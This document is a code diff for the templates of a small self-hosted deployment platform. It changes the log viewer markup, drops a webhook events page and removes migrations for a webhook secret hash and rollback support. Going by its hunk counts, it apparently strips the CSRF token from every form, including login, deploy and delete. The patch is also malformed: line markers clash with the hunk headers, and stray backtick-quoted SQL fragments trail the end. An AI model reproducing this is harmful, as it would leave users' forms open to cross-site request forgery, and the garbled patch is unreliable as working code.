            <h2 class="section-title">Last Deployment Build Logs</h2>
            <span x-bind:class="buildStatusBadgeClass" x-text="buildStatusLabel"></span>
        </div>
-        <div class="relative">
+        <div x-ref="buildLogsWrapper" class="bg-gray-900 rounded-lg p-4 overflow-auto" style="max-height: 400px;">
-            <div x-ref="buildLogsWrapper" class="bg-gray-900 rounded-lg p-4 overflow-y-auto" style="max-height: 400px;">
+            <pre class="text-gray-100 text-xs font-mono whitespace-pre-wrap" x-text="buildLogs"></pre>
                <pre class="text-gray-100 text-xs font-mono whitespace-pre-wrap break-words m-0" x-text="buildLogs"></pre>
            </div>
            <button
                x-show="!_buildAutoScroll"
                x-transition
                @click="_buildAutoScroll = true; Alpine.store('utils').scrollToBottom($refs.buildLogsWrapper)"
                class="absolute bottom-2 right-4 bg-primary-600 hover:bg-primary-700 text-white text-xs px-3 py-1 rounded-full shadow-lg opacity-90 hover:opacity-100 transition"
                title="Scroll to bottom"
            >↓ Follow</button>
        </div>
    </div>
@@ -440,7 +339,6 @@
        <h2 class="text-lg font-medium text-error-700 mb-4">Danger Zone</h2>
        <p class="text-error-600 text-sm mb-4">Deleting this app will remove all configuration and deployment history. This action cannot be undone.</p>
        <form method="POST" action="/apps/{{.App.ID}}/delete" x-data="confirmAction('Are you sure you want to delete this app? This action cannot be undone.')" @submit="confirm($event)">
                {{ .CSRFField }}
            <button type="submit" class="btn-danger">Delete App</button>
        </form>
    </div>
--- a/templates/app_edit.html
+++ b/templates/app_edit.html
@@ -21,7 +21,6 @@
        {{template "alert-error" .}}
        <form method="POST" action="/apps/{{.App.ID}}" class="space-y-6">
                {{ .CSRFField }}
            <div class="form-group">
                <label for="name" class="label">App Name</label>
                <input
--- a/templates/app_new.html
+++ b/templates/app_new.html
@@ -21,7 +21,6 @@
        {{template "alert-error" .}}
        <form method="POST" action="/apps" class="space-y-6">
                {{ .CSRFField }}
            <div class="form-group">
                <label for="name" class="label">App Name</label>
                <input
--- a/templates/base.html
+++ b/templates/base.html
@@ -15,11 +15,7 @@
    </div>
    {{template "footer" .}}
    <script defer src="/s/js/alpine.min.js"></script>
-    <script src="/s/js/utils.js"></script>
+    <script src="/s/js/app.js"></script>
    <script src="/s/js/components.js"></script>
    <script src="/s/js/app-detail.js"></script>
    <script src="/s/js/deployment.js"></script>
    <script src="/s/js/dashboard.js"></script>
 </body>
 </html>
 {{end}}
@@ -36,7 +32,6 @@
                New App
            </a>
            <form method="POST" action="/logout" class="inline">
                {{ .CSRFField }}
                <button type="submit" class="btn-text">Logout</button>
            </form>
        </div>
--- a/templates/dashboard.html
+++ b/templates/dashboard.html
@@ -69,7 +69,6 @@
                            <a href="/apps/{{.App.ID}}" class="btn-text text-sm py-1 px-2">View</a>
                            <a href="/apps/{{.App.ID}}/edit" class="btn-secondary text-sm py-1 px-2">Edit</a>
                            <form method="POST" action="/apps/{{.App.ID}}/deploy" class="inline">
                {{ $.CSRFField }}
                                <button type="submit" class="btn-success text-sm py-1 px-2">Deploy</button>
                            </form>
                        </div>
--- a/templates/deployments.html
+++ b/templates/deployments.html
@@ -18,7 +18,6 @@
    <div class="section-header">
        <h1 class="text-2xl font-medium text-gray-900">Deployment History</h1>
        <form method="POST" action="/apps/{{.App.ID}}/deploy" @submit="submitDeploy()">
                {{ .CSRFField }}
            <button type="submit" class="btn-success" x-bind:disabled="isDeploying" x-bind:class="{ 'opacity-50 cursor-not-allowed': isDeploying }">
                <span x-text="isDeploying ? 'Deploying...' : 'Deploy Now'"></span>
            </button>
@@ -86,19 +85,10 @@
                    </a>
                    {{end}}
                </div>
-                <div class="relative">
+                <div x-ref="logsWrapper" class="bg-gray-900 rounded-lg p-4 overflow-auto" style="max-height: 400px;">
-                    <div x-ref="logsWrapper" class="bg-gray-900 rounded-lg p-4 overflow-y-auto" style="max-height: 400px;">
+                    <pre class="text-gray-100 text-xs font-mono whitespace-pre-wrap" x-text="logs"></pre>
                        <pre class="text-gray-100 text-xs font-mono whitespace-pre-wrap break-words m-0" x-text="logs"></pre>
                </div>
-                    <button
+                {{if .Logs.Valid}}<script type="text/plain" class="initial-logs">{{.Logs.String}}</script>{{end}}
                        x-show="!_autoScroll"
                        x-transition
                        @click="_autoScroll = true; Alpine.store('utils').scrollToBottom($refs.logsWrapper)"
                        class="absolute bottom-2 right-4 bg-primary-600 hover:bg-primary-700 text-white text-xs px-3 py-1 rounded-full shadow-lg opacity-90 hover:opacity-100 transition"
                        title="Scroll to bottom"
                    >↓ Follow</button>
                </div>
                {{if .Logs.Valid}}<div hidden class="initial-logs" data-logs="{{.Logs.String}}"></div>{{end}}
            </div>
            {{end}}
        </div>
@@ -113,7 +103,6 @@
                <p class="empty-state-description">Deploy your application to see the deployment history here.</p>
                <div class="mt-6">
                    <form method="POST" action="/apps/{{.App.ID}}/deploy" @submit="submitDeploy()">
                {{ .CSRFField }}
                        <button type="submit" class="btn-success" x-bind:disabled="isDeploying" x-bind:class="{ 'opacity-50 cursor-not-allowed': isDeploying }">
                            <span x-text="isDeploying ? 'Deploying...' : 'Deploy Now'"></span>
                        </button>
--- a/templates/login.html
+++ b/templates/login.html
@@ -14,7 +14,6 @@
            {{template "alert-error" .}}
            <form method="POST" action="/login" class="space-y-6">
                {{ .CSRFField }}
                <div class="form-group">
                    <label for="username" class="label">Username</label>
                    <input
--- a/templates/setup.html
+++ b/templates/setup.html
@@ -14,7 +14,6 @@
            {{template "alert-error" .}}
            <form method="POST" action="/setup" class="space-y-6">
                {{ .CSRFField }}
                <div class="form-group">
                    <label for="username" class="label">Username</label>
                    <input
--- a/templates/templates.go
+++ b/templates/templates.go
@@ -44,7 +44,6 @@ func initTemplates() {
 		"app_detail.html",
 		"app_edit.html",
 		"deployments.html",
 		"webhook_events.html",
 	}
 	pageTemplates = make(map[string]*template.Template)
--- a/templates/webhook_events.html
+++ b/templates/webhook_events.html
@@ -1,79 +0,0 @@
 {{template "base" .}}
 {{define "title"}}Webhook Events - {{.App.Name}} - µPaaS{{end}}
 {{define "content"}}
 {{template "nav" .}}
 <main class="max-w-4xl mx-auto px-4 py-8">
    <div class="mb-6">
        <a href="/apps/{{.App.ID}}" class="text-primary-600 hover:text-primary-800 inline-flex items-center">
            <svg class="w-4 h-4 mr-1" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M15 19l-7-7 7-7"/>
            </svg>
            Back to {{.App.Name}}
        </a>
    </div>
    <div class="section-header">
        <h1 class="text-2xl font-medium text-gray-900">Webhook Events</h1>
    </div>
    {{if .Events}}
    <div class="card overflow-hidden">
        <table class="table">
            <thead class="table-header">
                <tr>
                    <th>Time</th>
                    <th>Event</th>
                    <th>Branch</th>
                    <th>Commit</th>
                    <th>Status</th>
                </tr>
            </thead>
            <tbody class="table-body">
                {{range .Events}}
                <tr>
                    <td class="text-gray-500 text-sm whitespace-nowrap">
                        <span x-data="relativeTime('{{.CreatedAt.Format `2006-01-02T15:04:05Z07:00`}}')" x-text="display" class="cursor-default" title="{{.CreatedAt.Format `2006-01-02 15:04:05`}}"></span>
                    </td>
                    <td class="text-gray-700 text-sm">{{.EventType}}</td>
                    <td class="font-mono text-gray-500 text-sm">{{.Branch}}</td>
                    <td class="font-mono text-gray-500 text-xs">
                        {{if and .CommitSHA.Valid .CommitURL.Valid}}
                        <a href="{{.CommitURL.String}}" target="_blank" rel="noopener noreferrer" class="text-primary-600 hover:text-primary-800">{{.ShortCommit}}</a>
                        {{else if .CommitSHA.Valid}}
                        {{.ShortCommit}}
                        {{else}}
                        <span class="text-gray-400">-</span>
                        {{end}}
                    </td>
                    <td>
                        {{if .Matched}}
                            {{if .Processed}}
                            <span class="badge-success">Matched</span>
                            {{else}}
                            <span class="badge-warning">Matched (pending)</span>
                            {{end}}
                        {{else}}
                        <span class="badge-neutral">No match</span>
                        {{end}}
                    </td>
                </tr>
                {{end}}
            </tbody>
        </table>
    </div>
    {{else}}
    <div class="card">
        <div class="empty-state">
            <svg class="empty-state-icon" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                <path stroke-linecap="round" stroke-linejoin="round" stroke-width="1.5" d="M13 10V3L4 14h7v7l9-11h-7z"/>
            </svg>
            <h3 class="empty-state-title">No webhook events yet</h3>
            <p class="empty-state-description">Webhook events will appear here once your repository sends push notifications.</p>
        </div>
    </div>
    {{end}}
 </main>
 {{end}}
		`@@ -1,2 +0,0 @@`
			`-- Add webhook_secret_hash column for constant-time secret lookup`
			`ALTER TABLE apps ADD COLUMN webhook_secret_hash TEXT NOT NULL DEFAULT '';`
		`@@ -1,2 +0,0 @@`
			`-- Add previous_image_id to apps for deployment rollback support`
			`ALTER TABLE apps ADD COLUMN previous_image_id TEXT;`